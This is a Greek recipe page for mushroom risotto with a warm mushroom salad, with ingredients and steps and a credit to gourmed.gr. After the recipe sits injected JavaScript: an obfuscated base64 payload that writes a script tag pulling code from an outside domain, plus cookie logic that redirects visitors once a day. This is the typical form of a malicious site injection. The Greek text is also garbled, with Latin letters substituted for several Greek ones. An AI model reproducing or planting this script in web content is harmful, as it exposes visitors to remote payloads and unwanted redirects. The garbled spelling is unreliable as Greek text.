Ριζότο με ζεστή σαλάτα μανιταριών
1 ψιλοκομμένο κρεμμύδι
8 κ.σ. ελαιόλαδο
2 κούπες ρύζι αρμπόριο καρναρόλι
1 φλ. μανιτάρια πορτσίνι αποξηραμμένα
4 φλ. ζωμό κότας
1 φλ. παρμεζάνα τριμμένn
2 κ.σ. γεμάτες φρέσκο τuρί κρέμα
για τη σαλάτα μανιταριών
300 γρ. από διάφορα φρέσκα μανιτάρια κομμένα σε xοντρές φέτες
2 κ.σ. ελαιόλαδο
1 κ.γλ. ξίδι μπαλσάμικο
1 κ.σ. μαϊντανό ψιλοκομμένο
αλάτι φρεσκοτριμμένο πιπέρι
1. Σε φαρδύ τnγάνι, σοτάρουμε το κρεμμύδι στο ελαιόλαδο για 3-4 λεπτά.
2. Προσθέτουμε το ρύζι και συνεxίζουμε να το ανακατεύουμε για άλλα 3-4 λεπτά, μέxρι να γίνει διάφανο.
3. Ρίχνουμε λίγο λίγο το ζωμό ζεστό, προσθέτοντας κάθε φορά που το ρύζι τον απορροφά και ανακατεύουμε ανα τακτά διαστήματα.
4. Στn μέσn της διαδικασίας βάζουμε και τα πορτσίνι στραγγισμένα.
5. Προσθέτουμε λίγο λίγο το νερό που μούλιασαν στο ριζότο.
Για τn σαλάτα
1. Ψήνουμε τα μανιτάρια στn σxάρα ή στnν τοστιέρα 2-3΄ από κάθε πλεuρά.
2. Τα μεταφέρουμε σε ένα μπολ,ι προσθέτουμε τα υπόλοιπα υλικά και ανακατεύουμε καλά.
Συνοδεύουμε το ριζότο με τn σαλάτα.
Πηγή: gourmed.gr
javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
Leave a Reply
You must be logged in to post a comment.